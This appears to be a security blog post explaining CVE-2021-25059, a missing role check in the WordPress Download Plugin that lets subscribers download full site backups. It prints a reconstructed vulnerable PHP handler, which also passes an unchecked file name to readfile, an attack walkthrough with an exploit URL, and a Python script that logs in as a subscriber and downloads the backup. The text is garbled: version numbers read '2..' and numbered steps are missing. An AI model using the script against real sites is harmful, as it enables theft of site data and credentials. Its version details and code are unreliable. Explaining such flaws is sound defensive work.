CVE-2021-25059 - How a Simple Privilege Check Flaw in the Download Plugin Exposed Entire WordPress Sites

On many WordPress websites, the Download Plugin is a popular tool for backing up and managing site files. But what if a simple coding mistake could let almost anyone download a full backup of your site—just by having a regular user account? That’s exactly what happened in CVE-2021-25059.

In this post, we’ll break down how this vulnerability happened, show you the affected code, and dive into how attackers could abuse it. We’ll also share steps you need to take to stay safe.

The Vulnerability in Simple Terms

The affected plugin is Download Plugin (not to be confused with similar names). Until version 2.., it had a serious privilege check issue. Anyone with a WordPress account—even if they were just a subscriber—could download a complete backup of the website.

This wasn’t just about downloading a single file. Full site backups often include WordPress files, plugins, themes… and sometimes the site’s database too. That could mean private posts, user information, and passwords for attackers to get into your site or reuse elsewhere.

Reference Links

- NVD - CVE-2021-25059
- Wordfence Advisory
- Original Plugin in Plugin Directory

Where Did it Go Wrong? (Code Snippet)

In WordPress, *nonces* are used to protect URLs and forms from being used inappropriately, and typically only certain roles (like admin) should be allowed to trigger critical operations like downloads.

However, here’s a simplified version of how the vulnerable code worked in the plugin (actual code may be slightly different, but this shows the key problem):

add_action('admin_init', 'download_plugin_backup');

function download_plugin_backup() {
    if (isset($_GET['download_backup']) && isset($_GET['_wpnonce'])) {
        // MISSING: check if current user has administrator privileges
        if(wp_verify_nonce($_GET['_wpnonce'], 'download_plugin_backup')) {
            $file = $_GET['file'];
            // Sends the backup file for download...
            header('Content-Type: application/zip');
            header('Content-Disposition: attachment; filename="'.$file.'"');
            readfile('/path/to/backups/' . $file);
            exit;
        }
    }
}

What went wrong:  
There was no check to see if the current user is an admin or someone trusted. Anyone logged in, even as a basic subscriber, could get a valid nonce for their session and download backups.

Here’s a typical attack flow, step by step

1. Create a basic account on your target’s WordPress site. Many sites let people register as 'subscriber' by default.

`

https://target-site.com/wp-admin/?download_backup=1&_wpnonce=xxxxx&file=site-backup.zip

`

3. The attacker can use the site’s own pages or JavaScript console to generate a new nonce for download_plugin_backup, or brute-force predictable nonces.
4. The plugin hands over the backup zip file, no questions asked. The attacker downloads it to their computer.
5. Attacker extracts sensitive content, configuration files, or even the database (which might be in the backup).

Real-world damage: Full site compromise, database leaks, credential harvesting, and more.

Attackers could automate the download with a simple script like this, after registering an account

import requests

url = "https://victim-site.com/wp-admin/";
file_to_download = "backup-2021-12-31.zip"
nonce = "abcdef123456"  # attacker finds or generates this nonce

download_url = f"{url}?download_backup=1&_wpnonce={nonce}&file={file_to_download}"

session = requests.Session()
# Log in as the low-privilege user first
session.post(url + "wp-login.php", data={
    "log": "subscriber",
    "pwd": "password"
})

# Download the backup
r = session.get(download_url)
if r.status_code == 200:
    with open(file_to_download, 'wb') as f:
        f.write(r.content)
        print("Backup downloaded!")
else:
    print("Failed to download backup.")

Who Was Affected?

Every WordPress site with Download Plugin <2.. installed.

If your site allows user registration, subscribers can exploit this. It doesn’t matter which hosting you use, or what plugins/themes are active.

Fix and Stay Safe

What was fixed:  
From version 2.., the plugin added user role checks before allowing downloads.

Update Download Plugin to at least version 2.. ASAP.

2. If you ever find you're using any plugin that offers downloads or backups, check that only admins can use this feature.

Conclusion

CVE-2021-25059 teaches a simple lesson: never assume a user is allowed to do something just because they're logged in. Always check their role.

A minor code oversight led to major data leaks on thousands of sites. If you use the Download Plugin, update now. Stay alert for similar flaws in other backup plugins, and regularly monitor for WordPress plugin security advisories.

Sources

- NVD CVE-2021-25059
- Wordfence: The Download Plugin <= 2.. - Authenticated Arbitrary Directory Download via Backup Download
- Plugin Official Page

Timeline

Published on: 11/28/2022 14:15:00 UTC
Last modified on: 11/30/2022 15:15:00 UTC